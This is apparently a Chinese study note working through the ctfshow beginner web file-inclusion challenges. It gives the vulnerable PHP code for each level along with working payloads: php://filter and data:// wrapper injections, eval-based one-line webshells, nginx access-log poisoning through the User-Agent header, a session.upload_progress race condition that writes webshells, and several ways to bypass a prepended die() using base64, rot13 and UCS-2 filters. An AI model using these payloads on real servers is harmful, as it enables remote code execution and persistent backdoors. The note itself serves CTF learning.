ctfshow_web入门 文件包含 学习

文件包含

额，这是一个做题带学习的一个笔记

算是半做题，半学习的笔记吧，所以能写的方法和注解都会写。难免先得啰嗦

由于截图都是白色背景，所以使用夜间模式(右上角哦~)观看比较易于区分图片与浏览器背景

web 78

if(isset($_GET['file'])){
  $file = $_GET['file'];
  include($file);
}else{
  highlight_file(__FILE__);
}

观察一下，没有过滤，可以直接使用功能php://filter伪协议

?file=php://filter/convert.base64-encode/resource=flag.php

也可以用data伪协议

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs=
?file=data://text/plain,<?php system('tac flag.php');?>

也可以尝试php://input

web 79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
过滤了php,我们还可以使用data协议：
data://text/plain;base64,[commander]
data://text/plain,<?= system('ls');?>

普通data伪协议

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
?file=data://text/plain,<?php system('tac flag.php');?>
但是有点没懂，我都用了php为什么没被过滤

骚姿势：传入shell(一句话木马)

?file=data://text/plain,<?=eval($_POST[1])?>
post 1=phpinfo();

虽然说，传入一个shell有点小题大做，不过姿势确实有点骚，而且如果遇到一些将flag放在其他位置的题，有个shell找起flag来，也是很舒服的

web 80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

利用日志文件包含，emmm，

include加载的文件都会当做PHP进行解析。如果文件中有PHP代码，就会执行PHP代码。不是PHP代码的部分就会直接输出。

Nginx的日志文件是/var/log/nginx/access.log，对服务器的请求都会记录到日志文件中去，所以构造一个有马的请求(<?php eval($_POST[1]);?>)，再用file包含日志文件。所以就可以执行拿到shell了。

先添加user-agetn:<?= eval($_GET[5]);?>
执行
url?file=/var/log/nginx/access.log&5=phpinfo();

url?file=/var/log/nginx/access.log&5=system('tac fl0g.php');

问题：url的请求也会被包含进去，为啥在url中的马没法执行

因为：在get请求的数据会被url编码(<?)，在进入PHP之前不解码，所以无法当做PHP代码执行

web 81

可以继续日志包含

嗷，也是刚刚才知道(试了一下)，如果要用蚁剑连接的话，一句话木马得用POST传参。刚刚使用GET方式，虽然能够拿到shell,但是无法使用蚁剑连接

web 82

if(isset($_GET['file'])){
  $file = $_GET['file'];
  $file = str_replace("php", "???", $file);
  $file = str_replace("data", "???", $file);
  $file = str_replace(":", "???", $file);
  $file = str_replace(".", "???", $file);
  include($file);}else{
    highlight_file(__FILE__);
   }
因为过滤了.，所以无法导入日志文件了(/var/log/nginx/access.log)

请移步B站的文件包含的讲解，wp比较详细

做一个简单记录

虽然没有开启session，但是如果上传一个带有名字的session的值(SESSID aaa)，那么会在生成一个/tem/sess_aaa的文件

PHP_SESSION_UPLOAD_PRGRESS，获取实时文件上传进度，返回一个json

视频中的意思是，上传一个一句话木马，执行另外一个一句话木马。(额，大概就是：传木马A引木马B。有点久了，忘了)

由于是写的脚本，所以也比较方便。而且还能学到一招pyhton文件上传文件(找了很多地方都没找到过用python上传文件的方法)，脚本可以导ctfshow的群里找。

提一下，可以在师傅写的py脚本的data中加上proxy={'http':'127.0.0.1:8080'}设置代理

理解不了也没关系(因为我是废狗，理解不了)，可以跟着下面走，下面不用脚本

burp实现条件竞争

首先写一个html脚本用来上传文件

<html>
<body>

<form action="http://d052d9f7-57ce-444e-a56f-bb9f12251393.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php file_put_contents('/var/www/html/test1.php','<?php eval($_POST[test1]);?>');?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
备注：将代码写到第一个input的value中

好吧，我这个写的有点问题，不过不影响。上传脚本并且抓包，

将1.php修改为：<?php file_put_contents('/var/www/html/test2.php','<?php eval($_POST[test2]);?>');?>

注意，两边都不需要爆破，一直请求就行，所以在payloads中都做如下设置

然后开始请求，最后访问url/test2.php

接着tac fl0g.php即可

由于按理来讲不应该知道flag在什么文件中，需要自己发现，所以这里上传木马，应该是一个比较好的选择

利用session.upload_progress进行文件包含和反序列化渗透请看一下这位师傅的文章，理解一下原理。为什么放到后面呢，因为不先体验一下，弟弟我实在看不懂。

web 83

session_unset();session_destroy();if(isset($_GET['file'])){
$file = $_GET['file'];
  $file = str_replace("php", "???", $file);
  $file = str_replace("data", "???", $file);
  $file = str_replace(":", "???", $file);
  $file = str_replace(".", "???", $file);
include($file);}else{
  highlight_file(__FILE__);
}

代码中将session销毁了，叭过可以自己创建，换句话说就是可以白嫖上面的方法

可以直接把一句话给写到这里来，抓包的时候，一样的效果

web 84

也可以白嫖web 82的方法

if(isset($_GET['file'])){
  $file = $_GET['file'];
  $file = str_replace("php", "???", $file);
  $file = str_replace("data", "???", $file);
  $file = str_replace(":", "???", $file);
  $file = str_replace(".", "???", $file);
  system('rm -rf /tem/*');
  include($file);
}else{
  highlight_file(__FILE__);
}

代码中将session删除了，但是为什么能够执行呢？

嗷~原来是因为误打误撞的将爆破的线程开得比较多，在get的请求线程1刚刚删除/tem/*，在上传的线程1中又写了进去了。简单来说就是，刚刚删除完就写进去了。

web 85

继续白嫖(都还没看代码，就嫖了。。。，用的burp哈)

if(isset($_GET['file'])){
  $file = $_GET['file'];
  $file = str_replace("php", "???", $file);
  $file = str_replace("data", "???", $file);
  $file = str_replace(":", "???", $file);
  $file = str_replace(".", "???", $file);
  if(file_exists($file)){
    $content = file_get_contents($file);
  if(strpos($content, "<")>0){
    die("error");
  }
  include($file);
}
}else{
  highlight_file(__FILE__);
}
额，file指向文件是否存在，如果存在再判断文件中有没有<，如果有就die卧槽？为什么能够嫖呀？

看了一下，200中长度不一样的结果，成功包含sess_test1的请求，返回是error，error也就是被die了。

有看一下干翻服务器的返回，不过，看不懂。。。。吐了，早知道看看以前的是个啥。

看了一下视频，说的还是是线程问题，线程开大点。利用条件竞争。不过还是没看懂。

补充

因为刚刚提到不知道成功请求到的/tem/test1,是什么样的，所以这里做一个补充。我这里一直使用的burp。

web 84的重开环境，看样子，请求是请求成功了，但是，唯一一个309的状态码是502...

501upload_progress_|a:5:{s:10:"start_time";i:1627393610;s:14:"content_length";i:475;s:15:"bytes_processed";i:475;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:8:"test.txt";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1627393610;s:15:"bytes_processed";i:475;}}}

web 83重开环境 ，也成功了，给人的感觉是，如果include了session文件，那么会有一个upload_progress

web 86

白嫖web82方法

web 87

由于之前有一次做题，不会死亡绕过，恰好这个题很想死亡绕过，所以，必用死亡绕过

先看一下代码

if(isset($_GET['file'])){
  $file = $_GET['file'];
  $content = $_POST['content'];
  $file = str_replace("php", "???", $file);
  $file = str_replace("data", "???", $file);
  $file = str_replace(":", "???", $file);
  $file = str_replace(".", "???", $file);
  file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
  highlight_file(__FILE__);
}

看了一下代码，发现，需要对$file进行两次url加密，所以，貌似过滤就全部绕过了

法1：利用 php://filter

所以对$file的构造就是：

$file=php://filter/convert.base64-decode/resource=test2.php进行两次url加密$file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%35%25%33%64%25%37%34%25%36%35%25%37%33%25%37%34%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

接着说明一下，这里用的是php://filter/convert.base64-decode/resource=test2.php；

php://filter是伪协议的名字；convert.base64-decode是过滤器，对输入的内容就是进行base64解码

base64只对 a-z A-Z +] 进行加密解密，所以，<??>等是直接就不管的，当做看不见了，于是<?php die('别修了');?>就成了phpdie。由于base解码的时候，是4个字符4个字符解码的。在构造好的base64编码的一句话木马前加上两个字符即可(AA)。

看来一句话木马中，不能有?>，去掉?>

$content=AAPD9waHAgc3lzdGVtKCdscycpOw==

成功。当然，这里最好是直接传入一句话木马，免得一直传来传去的。为了方便做笔记，所以就整好看点的。(其实差不多)

看到个一个神奇思路

由于base64将=作为结束的判断，那么在=后的就不会被解码

详细请看一下，里面确实有几个很巧妙的死亡绕过方式，file_put_content和死亡·杂糅代码之缘

法2：利用php://filter/write=string.rot13/resource=test10.php

$file=php://filter/write=string.rot13/resource=test10.php
先对$file进行两次url加密
$file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%34%25%36%35%25%37%33%25%37%34%25%33%31%25%33%30%25%32%65%25%37%30%25%36%38%25%37%30

说明一下：php://filter/write=string.rot13/resource=test10.php

php://filter伪协议名称write=string.rot13过滤器通道 将传入的test10.php的字母进行13位平移(凯撒加密，移动13位)

通过13位平移，原来的<?php die('别秀了');?>也会移动13位，变成<?cuc qvr('别秀了');?>,这样就算是绕过die。在线rot转化工具

<?php eval($_GET[test10]);?>$contnt=<?cuc riny($_TRG[grfg10]);?>

看得见之前上传的文件

web 88

利用data伪协议，同时进行base64加密，由于过滤了=，所以可以在构造的 命令中添加上空格

?file=data://text/plain;base64,PD9waHAgICAgIHN5c3RlbSgndGFjIGZsMGcucGhwJyk7

web 116

不会，后来再补

web 117

highlight_file(__FILE__);
error_reporting(0);function filter($x){
  if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
  die('too young too simple sometimes naive!');
  }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

看样子，应该是一死亡绕过，在web87说了一点死亡绕过的方式和原因，这里就不再说了。多看看其它师傅博客，然后实操一下就明白了。

这里看到了，没有过滤php://filter所以这里还是打算用这个绕过，emmm但是过滤了base64，多以就没法绕过了。

看了看一个新的死亡绕过方式，利用convert.iconv.UCS-2LE.UCS-2BE过滤器，这个是将前后两个字符进行交替(abcd==>badc)，所以写入文件的<?php die();?>就会被扰乱，从而绕过。

? file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=test5.phpcontents=?<hp pvela$(P_SO[Tt"se5t]";)>?

访问test5.php

传入的contents需要我们先自己手动替换，这里给一个弟弟写的脚本进行前后替换(只是针对两个字符替换，PHP脚本对;有点)

str1="<?php eval($_POST['test5']);?>";
str2=''

for i in range(0,len(str1)):
    if i%2==0:
        if i+1<len(str1):
            str2=str2+str1[i+1]
        if i+1==len(str1):
            str2=str2+str1[i]
    if i%2==1:
        str2=str2+str1[i-1]

    #print(i)

print('content='+str2)
print(len(str1))

伪协议使用

file_put_content和死亡·杂糅代码之缘骚姿势也多

php://filter	读出文件
?file=php://filter/convert.base64-encode/resource=flag.php
$file=php://filter/convert.base64-decode/resource=test2.php 用来死亡绕过

输入数据前后交换
? file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=test5.php
contents=?<hp pvela$(P_SO[Tt"se5t]";)>?

php://filter	写入文件
?file=php://filter/write.string-rot13/resource=test1.php
post $content=<?cuc riny($_TRG[grfg10]);?>

php://input		以PHP方式执行传入的DATA
php://input  |post DATA

data://text		将传入的数据当做PHP解析执行
使用base64加密的data协议的时候，貌似不能使用?，虽然原理还不知道为什么，不过先记下了，想必是因为语言自身结构的问题，和协议没太大关系
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs=
?file=data://text/plain,<?= system('tac flag.php');?>

日志包含

1. 在user-agent中写入马，执行一次；引入日志文件，getshell

session

利用session.upload_progress进行文件包含和反序列化渗透

文章中的链接全是参考，就没有再列出了

因为是学习，难免会留下问题，如果师傅们认为有什么不正确的地方，请斧正斧正，谢谢~